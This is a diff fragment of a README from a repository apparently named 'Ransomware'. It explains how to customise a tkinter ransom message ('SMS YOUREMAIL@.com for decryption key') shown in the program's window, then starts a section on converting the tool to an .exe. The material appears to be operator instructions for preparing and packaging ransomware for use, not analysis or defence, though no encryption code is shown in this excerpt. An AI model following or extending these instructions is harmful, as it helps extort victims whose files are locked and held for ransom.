shotsakimbo/Ransomware/README.md

     sms_label = tk.Label(root, text="EXAMPLE: SMS YOUREMAIL@.com for decryption key")
     sms_label.pack(pady=5)
 ```
+- this will determine the message that shows at the top of your GUI

 ## Converting to .exe
 - open file location and type **cmd** and **enter** in the top left